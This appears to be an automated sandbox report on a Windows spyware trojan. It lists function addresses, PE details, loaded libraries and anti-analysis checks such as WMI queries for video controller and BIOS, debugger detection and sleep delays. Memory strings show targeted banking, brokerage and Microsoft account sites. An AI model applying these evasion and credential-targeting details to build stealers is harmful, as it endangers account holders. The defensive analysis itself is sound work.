Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_004308E0	3_2_004308E0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_004088F0	3_2_004088F0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0040D0FF	3_2_0040D0FF
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00415882	3_2_00415882
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0040A8A0	3_2_0040A8A0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_004390A0	3_2_004390A0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00409140	3_2_00409140
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0041D940	3_2_0041D940
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00416148	3_2_00416148
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00406160	3_2_00406160
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00433960	3_2_00433960
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0042F166	3_2_0042F166
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00415966	3_2_00415966
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00424974	3_2_00424974
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00440130	3_2_00440130
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_004229CD	3_2_004229CD
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_004111E9	3_2_004111E9
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0043C1B0	3_2_0043C1B0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0043F1B0	3_2_0043F1B0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00427A5A	3_2_00427A5A
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0041D260	3_2_0041D260
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00423A60	3_2_00423A60
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0042C26C	3_2_0042C26C
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0042CA35	3_2_0042CA35
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0042CAF1	3_2_0042CAF1
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0043F2F6	3_2_0043F2F6
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00404280	3_2_00404280
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0042C282	3_2_0042C282
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0043EA80	3_2_0043EA80
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00426340	3_2_00426340
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0042CB4C	3_2_0042CB4C
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00426360	3_2_00426360
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0041AB00	3_2_0041AB00
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00437300	3_2_00437300
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00427B08	3_2_00427B08
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00432B10	3_2_00432B10
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0043F330	3_2_0043F330
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00404BC0	3_2_00404BC0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_004073C0	3_2_004073C0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0043F3C0	3_2_0043F3C0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0041C3CC	3_2_0041C3CC
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_004393D0	3_2_004393D0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00423BE0	3_2_00423BE0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0040EB80	3_2_0040EB80
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0042238D	3_2_0042238D
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0043F450	3_2_0043F450
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00439C70	3_2_00439C70
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0042847D	3_2_0042847D
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00421C80	3_2_00421C80
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0041DC90	3_2_0041DC90
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_004274A5	3_2_004274A5
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00427CB0	3_2_00427CB0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00436554	3_2_00436554
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00432D70	3_2_00432D70
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0040ED75	3_2_0040ED75
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0043150E	3_2_0043150E
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0043C510	3_2_0043C510
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0041D530	3_2_0041D530
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00414DC0	3_2_00414DC0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00437DE0	3_2_00437DE0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_004065F0	3_2_004065F0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0042FDF9	3_2_0042FDF9
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0040AD90	3_2_0040AD90
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00405DA0	3_2_00405DA0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00436DB2	3_2_00436DB2
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0041FE7C	3_2_0041FE7C
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0043FE20	3_2_0043FE20
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00402ED0	3_2_00402ED0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0040C6F0	3_2_0040C6F0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0041DE90	3_2_0041DE90
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00418740	3_2_00418740
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00428F6C	3_2_00428F6C
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00414777	3_2_00414777
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_004237D0	3_2_004237D0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00417FE1	3_2_00417FE1
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0041EFE0	3_2_0041EFE0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00416F8D	3_2_00416F8D
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0042F7BC	3_2_0042F7BC
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_006E0412	3_2_006E0412
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_006D34A0	3_2_006D34A0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_006CDE42	3_2_006CDE42
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_006DE6FE	3_2_006DE6FE
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_006C973B	3_2_006C973B

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: String function: 006D1D88 appears 42 times
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: String function: 006D637D appears 34 times
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: String function: 00407EE0 appears 45 times
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: String function: 00414110 appears 82 times
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: String function: 006C9C50 appears 94 times

Source: UhsjR3ZFTD.exe

Static PE information: invalid certificate

Source: UhsjR3ZFTD.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: UhsjR3ZFTD.exe	Static PE information: Section: .BSS ZLIB complexity 1.0003265987168874
Source: UhsjR3ZFTD.exe	Static PE information: Section: .BSS ZLIB complexity 1.0003265987168874

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/0@1/1

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe

Code function: 3_2_00438860 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

3_2_00438860

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6440:120:WilError_03

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Command line argument: ^Qm		0_2_006D50B0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Command line argument: ^Qm		3_2_006D50B0

Source: UhsjR3ZFTD.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: UhsjR3ZFTD.exe, 00000003.00000003.2136162300.0000000005477000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2147684210.0000000005466000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2136562092.0000000005459000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: UhsjR3ZFTD.exe

ReversingLabs: Detection: 31%

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe

File read: C:\Users\user\Desktop\UhsjR3ZFTD.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\UhsjR3ZFTD.exe "C:\Users\user\Desktop\UhsjR3ZFTD.exe"
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Process created: C:\Users\user\Desktop\UhsjR3ZFTD.exe "C:\Users\user\Desktop\UhsjR3ZFTD.exe"
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Process created: C:\Users\user\Desktop\UhsjR3ZFTD.exe "C:\Users\user\Desktop\UhsjR3ZFTD.exe"	Jump to behavior

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: UhsjR3ZFTD.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: UhsjR3ZFTD.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: UhsjR3ZFTD.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: UhsjR3ZFTD.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: UhsjR3ZFTD.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: UhsjR3ZFTD.exe

Static PE information: section name: .CODE

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 0_2_006C9E0A push ecx; ret	0_2_006C9E1D
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0043F000 push eax; mov dword ptr [esp], 5B5A5908h	3_2_0043F005
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00445408 push ebp; ret	3_2_00445409
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0044866F pushfd ; retf	3_2_00448677
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_006C9E0A push ecx; ret	3_2_006C9E1D

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe TID: 6792	Thread sleep time: -120000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe TID: 6792	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 0_2_006DB358 FindFirstFileExW,	0_2_006DB358
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 0_2_006DB409 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_006DB409
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_006DB358 FindFirstFileExW,	3_2_006DB358
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_006DB409 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_006DB409

Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: UhsjR3ZFTD.exe, 00000003.00000003.2192097972.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2217269597.0000000002E97000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227144209.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2182020938.0000000002E97000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2134252099.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2200589372.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000002.2227827824.0000000002E97000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2201305187.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2181421854.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227004890.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW1
Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: UhsjR3ZFTD.exe, 00000003.00000003.2192097972.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2217269597.0000000002E97000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227144209.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2182020938.0000000002E97000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2134252099.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2200589372.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000002.2227827824.0000000002E97000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2201305187.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2181421854.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227004890.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: UhsjR3ZFTD.exe, 00000003.00000003.2147215994.000000000548C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696487552p
Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: UhsjR3ZFTD.exe, 00000003.00000002.2227782653.0000000002E5C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(T
Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: UhsjR3ZFTD.exe, 00000003.00000003.2147405490.000000000547F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe

Code function: 3_2_0043D910 LdrInitializeThunk,

3_2_0043D910

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe

Code function: 0_2_006D1AC0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_006D1AC0

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 0_2_006F019E mov edi, dword ptr fs:[00000030h]	0_2_006F019E
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 0_2_006C1BA0 mov edi, dword ptr fs:[00000030h]	0_2_006C1BA0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_006C1BA0 mov edi, dword ptr fs:[00000030h]	3_2_006C1BA0

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe

Code function: 0_2_006D6C90 GetProcessHeap,

0_2_006D6C90

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 0_2_006C9AC7 SetUnhandledExceptionFilter,	0_2_006C9AC7
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 0_2_006D1AC0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_006D1AC0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 0_2_006C9AD3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_006C9AD3
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 0_2_006C9713 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_006C9713
